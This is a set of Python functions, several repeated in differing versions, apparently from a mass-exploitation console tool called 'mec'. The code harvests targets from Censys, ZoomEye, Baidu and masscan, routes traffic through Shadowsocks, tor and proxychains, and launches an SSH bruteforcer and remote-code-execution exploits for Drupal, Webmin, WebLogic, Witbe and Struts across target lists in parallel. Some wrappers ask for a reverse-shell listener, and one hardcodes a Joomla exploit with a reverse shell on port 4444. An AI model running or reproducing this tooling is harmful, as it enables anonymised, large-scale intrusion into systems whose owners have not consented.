def run_info(**kwargs): """ mec status """ session = kwargs.get("session", None) if session.shadowsocks.is_usable(): session.proxy_status = "OK" colors.colored_print( f''' session ------- [*] Current directory: {os.getcwd()} [*] Root directory: {session.init_dir} [*] Log file: {session.logfile} [*] Target: {session.ip_list} PROXY ----- [*] Shadowsocks config: {session.shadowsocks.ss_url} [*] Shadowsocks local port: {session.shadowsocks.local_port} [*] Shadowsocks connectivity: {session.proxy_status} ''', colors.CYAN)
def start_install(): ''' installation procedure ''' # virtualenv os.system('mkdir ~/.mec') os.system('cp -R ./* ~/.mec') if not os.path.isdir("~/.mec/.venv"): if os.system("virtualenv -p /usr/bin/python3 ~/.mec/.venv") != 0: colors.colored_print("Error setting up virtualenv", colors.RED) sys.exit(1) venv_py = "~/.mec/.venv/bin/python3" # for user interface and autocompletion pip_install(venv_py, 'readline') # for HTTP jobs pip_install(venv_py, 'requests') # psutil for killing procs by name pip_install(venv_py, 'psutil') # tqdm for progress bar pip_install(venv_py, 'tqdm') # install beatifulsoup4 if not already installed pip_install(venv_py, 'bs4') # install HTML5lib if not already installed pip_install(venv_py, 'html5lib') # install docopt if not already installed pip_install(venv_py, 'docopt') print(colors.BLUE + "Done installing dependencies, now copying files." + colors.END) # clean temp files. os.system('rm -rf ~/.mec/mec') os.system('rm -rf ~/.mec/install.py') # zoomeye account: zoomeye = str(input('Would you like to use zoomeye? (yes/No) ')).lower() if zoomeye in ('yes', 'y'): user = str(input('Username: '******'Password: '******'/conf/zoomeye.conf', "w") conf.write("user:"******"\n") conf.write("password:"******"\n") censys = str(input('Would you like to use censys? (yes/No) ')).lower() if censys in ('yes', 'y'): uid = str(input('API ID: ')) sec = str(getpass.getpass('Secret: ')) conf2 = open(MECROOT + '/conf/censys.conf', "w") key = {"uid": uid, "sec": sec} conf2.write(json.dumps(key)) if not os.path.isfile("/usr/local/bin/mec"): # add mec to $PATH os.system('sudo cp mec /usr/local/bin/') # fix permissions os.system('sudo chmod +x /usr/local/bin/mec && chmod +x ~/.mec/mec.py') print(colors.GREEN + colors.BOLD + "Installation completed. try: $ mec" + colors.END)
def run_search(query, pages): i = 0 hosts = [] censys_search = CensysSearch() # check account account_info = censys_search.query_account() if account_info == "": return "" colors.colored_print(account_info, colors.BLUE) while i <= int(pages): i += 1 sys.stdout.flush() sys.stdout.write( f"{colors.BLUE}[+] Crawling page {i}...{colors.END}\r") # multi thread causes temp ban. hosts = hosts + censys_search.search_hosts(query, i) print() out_name = query + ".txt" for special_ch in ['"', "'", ':', '!', '\\', '/']: if special_ch in out_name: out_name = out_name.replace(special_ch, '-') file = 'data/censys_' + out_name out = open(file, "a") print(str(len(hosts)) + " Host found.") out.write("\n".join(str(x) for x in hosts)) return file
def run_info(**kwargs): """ mec status """ session = kwargs.get("session", None) if session is None: console.print_error("[-] info: session not exist") return # update via user config file session.read_config() if session.shadowsocks.is_usable(): session.proxy_status = "OK" colors.colored_print( f''' session ------- [*] Auto-Update: {session.auto_update} [*] Current directory: {os.getcwd()} [*] Root directory: {session.init_dir} [*] Log file: {session.logfile} [*] Target: {session.ip_list} proxy ----- [*] Shadowsocks config: {session.shadowsocks.ss_url} [*] Shadowsocks local port: {session.shadowsocks.local_port} [*] Shadowsocks connectivity: {session.proxy_status} ''', colors.CYAN)
def ssh_bruteforcer(session): ''' bruteforce one target using a password list ''' colors.colored_print('\n[*] Welcome to SSH bruteforcer', colors.BLUE) password_list = console.input_check( "[*] Password list file to use (put them under ./data): ", allow_blank=False, choices=glob.glob(core.MECROOT+"/data/*.txt")) if not os.path.isfile(password_list): console.print_error("[-] Password list not found") return None # command to exec command = console.input_check("[*] Command to exec: ", allow_blank=False) # args list exploit = 'ssh_bruteforce.py' work_path = '/ssh-bruteforce/' exec_path = exploit custom_args = ["-p", password_list, "-c", command] jobs = 100 # start scanner return core.Scanner(work_path, exec_path, custom_args, jobs, session)
def main(): ''' handles user interface ''' colors.colored_print("[*] Default target list is ./data/ip_list.txt", colors.CYAN) SESSION.ip_list = SESSION.init_dir + '/data/ip_list.txt' futil.write_file(text=f"{os.getpid()}", filepath=SESSION.pidfile) while True: try: if os.getcwd() != core.MECROOT: os.chdir(core.MECROOT) input_cmd = rlinit.prompt(session=SESSION) try: cmd.cmd_handler(SESSION, input_cmd) except (KeyboardInterrupt, EOFError, SystemExit): sys.exit(0) except FileNotFoundError: console.print_error(f"[-] {core.MECROOT} not found???") sys.exit(1) except KeyboardInterrupt: answ = console.yes_no("\n[?] Are you sure to exit?") if answ: futil.check_kill_process('ss-proxy') sys.exit(0) else: continue
def run_check_proxy_pool(**kwargs): """ check if proxy_pool is usable """ session = kwargs.get("session", None) # update via user config file session.read_config() # check tor tor_status = "Unknown" def check_tor(): # also check tor try: requests.get("http://ifconfig.me", timeout=10, proxies=dict(http='socks5://127.0.0.1:9050', https='socks5://127.0.0.1:9050')) except BaseException: return False return True def run_check(res): res['tor_status'] = "DISCONNECTED" if check_tor(): res['tor_status'] = "OK" if session is None: console.print_error("[-] info: session not exist") return # check proxy chain res['proxy_status'] = "DISCONNECTED" if session.test_proxy(): res['proxy_status'] = "OK" if session.proxy_pool_api == '': console.print_warning("[!] proxy_pool_api not configured") else: res = Manager().dict() proc = Process(target=run_check, args=(res,)) proc.start() console.print_status( "[*] please wait while checking proxy chain connectivity...", proc ) proc.join() tor_status = res['tor_status'] session.proxy_status = res['proxy_status'] colors.colored_print(f""" proxy ----- [*] proxy_pool API: {session.proxy_pool_api} [*] tor connectivity: {tor_status} [*] proxy chain connectivity: {session.proxy_status} """, colors.CYAN)
def pkg_install(pkg_mgr, pkg): ''' install package via system package manager ''' if os.system("{} {} -y".format(pkg_mgr, pkg)) != 0: colors.colored_print( "Could not install {}, some pypi packages might fail to install". format(pkg), colors.RED)
def run_init(**kwargs): """ Return to init directory """ session = kwargs.get("session") colors.colored_print('[*] Going back to init_dir...', colors.BLUE) os.chdir(session.init_dir)
def start_install(): ''' installation procedure ''' # virtualenv os.system('mkdir ~/.mec') os.system('cp -R ./* ~/.mec') if not os.path.isdir("~/.mec/.venv"): if os.system("virtualenv -p /usr/bin/python3 ~/.mec/.venv") != 0: colors.colored_print("Error setting up virtualenv", colors.RED) sys.exit(1) venv_py = "~/.mec/.venv/bin/python3" # use requirements.txt pip_install(venv_py, '-r requirements.txt') print(colors.BLUE + "Done installing dependencies, now copying files." + colors.END) # clean temp files. os.system('rm -rf ~/.mec/mec') os.system('rm -rf ~/.mec/install.py') # zoomeye account: zoomeye = str(input('Would you like to use zoomeye? (yes/No) ')).lower() if zoomeye in ('yes', 'y'): user = str(input('Username: '******'Password: '******'/conf/zoomeye.conf', "w") conf.write("user:"******"\n") conf.write("password:"******"\n") censys = str(input('Would you like to use censys? (yes/No) ')).lower() if censys in ('yes', 'y'): uid = str(input('API ID: ')) sec = str(getpass.getpass('Secret: ')) conf2 = open(MECROOT + '/conf/censys.conf', "w") key = {"uid": uid, "sec": sec} conf2.write(json.dumps(key)) if not os.path.isfile("/usr/local/bin/mec"): # add mec to $PATH os.system('sudo cp mec /usr/local/bin/') # fix permissions os.system('sudo chmod +x /usr/local/bin/mec && chmod +x ~/.mec/mec.py') print(colors.GREEN + colors.BOLD + "Installation completed. try: $ mec" + colors.END)
def run_exploits(**kwargs): """ List all usable exploits """ do_print = kwargs.get("do_print", True) exp_list = futil.list_exp() if not do_print: # pass this list to readline completer return exp_list colors.colored_print('[+] Available exploits: ', colors.CYAN) for poc in exp_list: colors.colored_print(poc, colors.BLUE) return None
def run_target(**kwargs): """ Change target list """ session = kwargs.get("session") target = kwargs.get("args")[0] if target not in os.listdir(session.init_dir + '/data'): console.print_error("[-] Target file not found") return colors.colored_print('[i] Target changed to {}'.format(target), colors.BLUE) session.ip_list = session.init_dir + \ '/data/' + target
def run_censys(**kwargs): """ Crawler for Censys.io """ session = kwargs.get("session", None) try: output = censys.start() if console.yes_no("\n[?] Use collected URLs as target?"): session.ip_list = session.init_dir + "/" + output colors.colored_print( '[i] Target changed to {}'.format( session.ip_list), colors.BLUE) except BaseException: return
def run_info(**kwargs): """ mec status """ session = kwargs.get("session", None) # update via user config file session.read_config() colors.colored_print(f''' session ------- [*] Auto-Update: {session.auto_update} [*] Current directory: {os.getcwd()} [*] Root directory: {session.init_dir} [*] Log file: {session.logfile} [*] Target: {session.ip_list} ''', colors.CYAN)
def run_target(**kwargs): """ Change target list """ session = kwargs.get("session") try: target = kwargs.get("args")[0] except IndexError: console.print_error("[-] What target?") return if target not in os.listdir(session.init_dir + '/data'): console.print_error(f"[-] Target list file '{target}' not found") return colors.colored_print( '[i] Target list changed to {}'.format(target), colors.BLUE) session.ip_list = session.init_dir + \ '/data/' + target
def drupal_cve20196340(session): ''' drupal RCE ''' colors.colored_print('\n[*] Welcome to Drupal CVE-2019-6340', colors.BLUE) # shell server config command = console.input_check('[?] Command to execute on the target: ', allow_blank=False) # exploit config exploit = 'cve-2019-6340_cmd.py' work_path = '/drupal/' exec_path = exploit custom_args = ["-c", command] jobs = 50 # start scanner return core.Scanner(work_path, exec_path, custom_args, jobs, 0.1, session)
def webmin_cve_2019_15107(session): ''' CVE_2019_15107 RCE ''' colors.colored_print('\n[*] Welcome to Webmin CVE-2019-15107', colors.BLUE) # shell server config command = console.input_check( '[?] Command to execute on the target: ', allow_blank=False) # exploit config exploit = 'webmin.py' work_path = '/webmin/' exec_path = exploit custom_args = ["-c", command] jobs = 50 # start scanner return core.Scanner(work_path, exec_path, custom_args, jobs, session)
def witbe(session): ''' witbe rce ''' colors.colored_print('\n[*] Welcome to Witbe RCE', colors.BLUE) # shell server config rhost = console.input_check('[?] IP of your shell server: ', ip_check=True) rport = console.input_check('[?] and Port? ', check_type=int) # exploit config exploit = 'witbe.py' work_path = '/witbe/' exec_path = exploit custom_args = ["-l", rhost, "-p", rport] jobs = 50 # start scanner return core.Scanner(work_path, exec_path, custom_args, jobs, session)
def weblogic_cve201710271(session): ''' CVE-2017-10271 ''' colors.colored_print( '\n[*] Welcome to Weblogic CVE-2017-10271', colors.BLUE) # shell server config command = console.input_check( '[?] Command to execute on the target: ', allow_blank=False) # exploit config exploit = 'weblogic_cve-2017-10271.py' work_path = '/weblogic/' exec_path = exploit custom_args = ["-c", command] jobs = 50 # start scanner return core.Scanner(work_path, exec_path, custom_args, jobs, session)
def run_exploits(**kwargs): """ List all usable exploits """ do_print = kwargs.get("do_print", True) exp_list = futil.list_exp() if len(exp_list) == 0: console.print_error("[-] No exploits found") if console.yes_no("[?] Perhaps you need to check `info`?"): run_info(session=kwargs.get("session")) if not do_print: return exp_list colors.colored_print(f"[+] {len(exp_list)} available exploits: ", colors.CYAN) for poc in exp_list: colors.colored_print(poc, colors.BLUE) return None
def run_baidu(**kwargs): """ Search via m.baidu.com """ session = kwargs.get("session") command = kwargs.get("args") try: dork = command[0] count = int(command[1]) os.chdir(session.out_dir) colors.colored_print('[*] Searching on Baidu...', colors.PURPLE) baidu.spider(dork, count) if console.yes_no("\n[?] Use collected URLs as target?"): session.ip_list = session.out_dir + "/result.txt" except (EOFError, KeyboardInterrupt, SystemExit): console.print_warning("[-] Interrupted") return except BaseException as exc: console.print_error(f"[-] Error: {exc}") console.debug_except()
def weblogic_cve201710271(session): ''' CVE-2017-10271 ''' colors.colored_print('\n[*] Welcome to Weblogic CVE-2017-10271', colors.BLUE) # shell server config command = console.input_check('[?] Command to execute on the target: ', allow_blank=False) target_os = console.input_check( "[?] Target OS, default to linux [linux/win]: ", choices=["linux", "win"]) # exploit config exploit = 'weblogic_cve-2017-10271.py' work_path = '/weblogic/' exec_path = exploit custom_args = ["-c", command, "-os", target_os] jobs = 50 # start scanner return core.Scanner(work_path, exec_path, custom_args, jobs, 0.1, session)
def execute(cmd): ''' handles user input in console ''' # lol i don't want any errors here cmd = str(cmd).lower().strip() if cmd == '': return elif cmd == 'info': colored_print( '[*] Current directory: {}\ \n[*] Init directory: {}\ \n[*] Log file: {}\ \n[*] Target: {}\ \n[*] Proxy config: {}'.format( os.getcwd(), SESSION.init_dir, SESSION.logfile, SESSION.ip_list, SESSION.proxy_conf), colors.CYAN) elif cmd.startswith('target'): target = ''.join(cmd.split()[1:]) if target not in os.listdir(SESSION.init_dir + '/data'): return colored_print('[i] Target changed to {}'.format(target), colors.BLUE) SESSION.ip_list = SESSION.init_dir + \ '/data/' + target elif cmd == 'init' or cmd == 'i': colored_print('[*] Going back to init_dir...', colors.BLUE) os.chdir(SESSION.init_dir) elif cmd.startswith('baidu'): try: command = cmd.strip().split() dork = command[1] count = int(command[2]) os.chdir(SESSION.out_dir) colored_print('[*] Searching on Baidu...', colors.PURPLE) baidu.spider(dork, count) except (IndexError, EOFError, KeyboardInterrupt, SystemExit): return elif cmd == 'proxy': if not os.path.exists(SESSION.ss_config): console.print_error( '[-] Please make sure {} exists'.format(SESSION.ss_config)) try: subprocess.Popen( [SESSION.proxy_bin, '-c', SESSION.ss_config], stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=False) except BaseException as err: console.print_error( '[-] Error starting Shadowsocks proxy: ' + str(err)) debug_except() elif cmd == 'redis': console.print_error('[-] Under development') elif cmd.startswith('google'): try: cmd = cmd.strip().split() dork = cmd[1] # well yes im a lazy guy subprocess.call(['./exploits/joomla/joomlaCVE-2015-8562.py', '--dork', dork, '--revshell=\'127.0.0.1\'', '--port=4444']) except BaseException as err: console.print_error(str(err)) debug_except() elif cmd == 'q' or cmd == 'quit': check_kill_process('ss-proxy') sys.exit(0) elif cmd == 'h' or cmd == 'help' or cmd == '?': print(console.HELP_INFO) elif cmd == 'exploits': colored_print('[+] Available exploits: ', colors.CYAN) for poc in list_exp(): colored_print(poc, colors.BLUE) elif cmd == 'z' or cmd == "zoomeye": try: zoomeye.run() except (EOFError, KeyboardInterrupt, SystemExit): pass else: debug_except() elif cmd == 'x' or cmd == 'clear': os.system("clear") elif cmd == 'c' or cmd == 'reset': os.system("reset") elif cmd == "attack" or cmd == "e": attack() else: try: print( colors.BLUE + colors.BOLD + "[*] Exec: " + colors.END + colors.GREEN + cmd + colors.END + '\n') os.system(cmd) except (EOFError, KeyboardInterrupt, SystemExit): pass
def mod_exists(modulename): ''' check if a module exists without importing it ''' mod_spec = util.find_spec(modulename) return mod_spec is not None # distro check and initial packages DIST = "debian" try: import distro except ModuleNotFoundError: if os.system("python3 -m pip install distro --user") != 0: colors.colored_print("Please install pip first !!!", colors.RED) sys.exit(1) if mod_exists("distro"): import distro except ImportError: colors.colored_print("Please use python 3.6+ !!!", colors.RED) sys.exit(1) try: DIST = distro.linux_distribution(full_distribution_name=False)[0] except NameError: import platform # pylint: disable=deprecated-method DIST = platform.linux_distribution(full_distribution_name=0)[0].lower()
def attack(): ''' handles attack command ''' SESSION.use_proxy = input_check( '[?] Do you wish to use proxychains? [y/n] ', choices=['y', 'n']) == 'y' if SESSION.use_proxy: if shutil.which("proxychains4") is None: console.print_error("proxychains4 not found") return execute("proxy") answ = input_check('\n[?] Do you wish to use\ \n\n [a] built-in exploits\ \n [m] or launch your own manually?\ \n\n[=] Your choice: ', choices=['a', 'm']) if answ == 'a': print(colors.CYAN + colors.BOLD + '\n[?] Choose a module from: ' + colors.END + '\n') print(console.BUILT_IN) answ = input_check('[=] Your choice: ', check_type=int, choices=['0', '1', '2', '3', '4']) try: if answ == '0': scanner(exploit_exec.ssh_bruteforcer()) elif answ == '1': scanner(exploit_exec.weblogic()) elif answ == '2': console.print_error("[-] Not available") elif answ == '3': console.print_error("[-] Not available") elif answ == '4': scanner(exploit_exec.s2_045()) except (EOFError, KeyboardInterrupt, SystemExit): return elif answ == 'm': print(colors.CYAN + colors.UNDERLINE + colors.BOLD + "\nWelcome, in here you can choose your own exploit\n" + colors.END) colored_print('[*] Here are available exploits:\n', colors.CYAN) for poc in list_exp(): colored_print(poc + colors.END, colors.BLUE) exploit = input_check( "\n[*] Enter the path (eg. joomla/rce.py) of your exploit: ", choices=list_exp()) jobs = int( input_check("[?] How many processes each time? ", check_type=int)) custom_args = [] answ = input_check("[?] Do you need a reverse shell [y/n]? ", choices=['y', 'n']) if answ == 'y': lhost = input_check("[*] Where do you want me to send shells? ", allow_blank=False, ip_check=True) lport = input_check("[*] and at what port?", check_type=int) custom_args = ['-l', lhost, '-p', lport] else: pass custom_args += input_check( "[*] args for this exploit: ").strip().split() # parse user's exploit name exec_path = exploit.split('/')[1:] work_path = exploit.split('/')[:-1] exec_path = '/'.join(exec_path) work_path = '/'.join(work_path) # let user check if there's anything wrong print( colors.BLUE + '[*] Your exploit will be executed like\n' + colors.END, 'proxychains4 -q -f proxy.conf {} -t <target ip>'.format( exec_path), ' '.join(custom_args)) # args as parameter for scanner scanner_args = console.ScannerArgs(work_path, exec_path, custom_args, jobs) # start scanner scanner(scanner_args) else: console.print_error('[-] Invalid input')
def execute(cmd): ''' handles user input in console ''' # lol i don't want any errors here cmd = str(cmd).lower().strip() if cmd == '': return if cmd == "masscan": # check root, as masscan requires root privilege if os.geteuid() != 0: console.print_error( "[-] Please run mec as root in order to run masscan") return ports = console.input_check( "[?] What ports do you want to scan (eg. 80 443)? ").split() try: scan.masscan(ports) except KeyboardInterrupt: console.print_warning("[-] masscan exited") elif cmd == 'info': colored_print( '[*] Current directory: {}\ \n[*] Init directory: {}\ \n[*] Log file: {}\ \n[*] Target: {}\ \n[*] Proxy config: {}'.format(os.getcwd(), SESSION.init_dir, SESSION.logfile, SESSION.ip_list, SESSION.proxy_conf), colors.CYAN) elif cmd.startswith('target'): target = ''.join(cmd.split()[1:]) if target not in os.listdir(SESSION.init_dir + '/data'): console.print_error("[-] Target file not found") return colored_print('[i] Target changed to {}'.format(target), colors.BLUE) SESSION.ip_list = SESSION.init_dir + \ '/data/' + target elif cmd in ('init', 'i'): colored_print('[*] Going back to init_dir...', colors.BLUE) os.chdir(SESSION.init_dir) elif cmd.startswith('baidu'): try: command = cmd.strip().split() dork = command[1] count = int(command[2]) os.chdir(SESSION.out_dir) colored_print('[*] Searching on Baidu...', colors.PURPLE) baidu.spider(dork, count) if yes_no("Use collected URL's as target?"): SESSION.ip_list = SESSION.init_dir + "result.txt" except (IndexError, EOFError, KeyboardInterrupt, SystemExit): return elif cmd == 'proxy': if not os.path.exists(SESSION.ss_config): console.print_error('[-] Please make sure {} exists'.format( SESSION.ss_config)) try: subprocess.Popen([SESSION.proxy_bin, '-c', SESSION.ss_config], stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=False) except BaseException as err: console.print_error('[-] Error starting Shadowsocks proxy: ' + str(err)) debug_except() elif cmd == 'redis': console.print_error('[-] Under development') elif cmd.startswith('google'): try: cmd = cmd.strip().split() dork = cmd[1] # well yes im a lazy guy subprocess.call([ './exploits/joomla/joomlaCVE-2015-8562.py', '--dork', dork, '--revshell=\'127.0.0.1\'', '--port=4444' ]) except BaseException as err: console.print_error(str(err)) debug_except() elif cmd in ('q', 'quit'): check_kill_process('ss-proxy') sys.exit(0) elif cmd in ('h', 'help', '?'): print(console.HELP_INFO) elif cmd == 'exploits': colored_print('[+] Available exploits: ', colors.CYAN) for poc in list_exp(): colored_print(poc, colors.BLUE) elif cmd in ('z', "zoomeye"): try: console.print_warning( "[*] ZoomEye now asks for phone verification (+86 only)") zoomeye.run() except (EOFError, KeyboardInterrupt, SystemExit): pass else: debug_except() elif cmd == "censys": try: output = censys.start() if yes_no("Use collected URL's as target?"): SESSION.ip_list = SESSION.init_dir + "/" + output colored_print( '[i] Target changed to {}'.format(SESSION.ip_list), colors.BLUE) except BaseException: return elif cmd in ('x', 'reset'): os.system("reset") elif cmd in ('c', 'clear'): os.system("clear") elif cmd in ("attack", "e"): attack() else: try: print(colors.BLUE + colors.BOLD + "[*] Exec: " + colors.END, colors.GREEN + cmd, colors.END) os.system(cmd) except (EOFError, KeyboardInterrupt, SystemExit): return
def pip_install(venv_py, pkg): ''' python3 -m pip install pkg ''' colors.colored_print("Installing {} ... ".format(pkg), colors.BLUE) os.system('{} -m pip install {}'.format(venv_py, pkg))
def mod_exists(modulename): ''' check if a module exists without importing it ''' mod_spec = util.find_spec(modulename) return mod_spec is not None # distro check and initial packages DIST = "debian" try: import distro except ModuleNotFoundError: if os.system("python3 -m pip install distro --user") != 0: colors.colored_print("Please install pip first !!!", colors.RED) sys.exit(1) if mod_exists("distro"): import distro except ImportError: colors.colored_print("Please use python 3.6+ !!!", colors.RED) sys.exit(1) try: DIST = distro.linux_distribution(full_distribution_name=False)[0] except NameError: import platform # pylint: disable=deprecated-method, no-member DIST = platform.linux_distribution(full_distribution_name=0)[0].lower()
def attack(self): ''' handles attack command ''' self.use_proxy = console.yes_no( '[?] Do you wish to use proxy_pool/proxychains?') if self.use_proxy: if shutil.which("proxychains4") is None: console.print_error("proxychains4 not found") return # sleep between two subprocess open sleep_seconds = console.input_check("\n[?] Wait how many seconds" + " before each process launch?\n" + " (Set it to 0 when you want to use 100% CPU" + " / bandwidth\n Recommened value: 0.1)\n" + "\n[=] Your input: ", check_type=float) answ = console.input_check( '\n[?] Do you wish to use\ \n\n [1] built-in exploits\ \n [2] or launch your own manually?\ \n\n[=] Your choice: ', choices=['1', '2', 'built-in', 'manually']) if answ in ['1', 'built-in']: print( colors.CYAN + colors.BOLD + '\n[?] Choose a module from: ' + colors.END + '\n') colors.colored_print(futil.BUILT_IN, colors.GREEN) module = console.input_check( "[?] Choose your exploit module: ", choices=futil.BUILT_IN.split('\n'), allow_blank=False) try: scanner_instance = exploit_exec.EXPLOIT_DICT.get(module)(self) if scanner_instance is None: return scanner_instance.sleep_seconds = sleep_seconds scanner_instance.scan() return except (EOFError, KeyboardInterrupt, SystemExit): return # run custom exploits print( colors.CYAN + colors.UNDERLINE + colors.BOLD + "\nWelcome, in here you can invoke your own exploit\n" + colors.END) cmd.run_exploits() exploit = console.input_check( "\n[*] Enter the path (eg. test/test) to your exploit: ", choices=futil.list_exp()) jobs = int( console.input_check("[?] How many processes each time? ", check_type=int)) custom_args = console.input_check( "[*] Addtional args for this exploit (other than `-t <target>`): ").strip().split() # parse user's exploit name exec_path = exploit.split('/')[1:] work_path = exploit.split('/')[:-1] exec_path = '/'.join(exec_path) work_path = '/'.join(work_path) # args as parameter for scanner scanner_instance = Scanner(work_path, exec_path, custom_args, jobs, sleep_seconds, self) # start scanner scanner_instance.scan()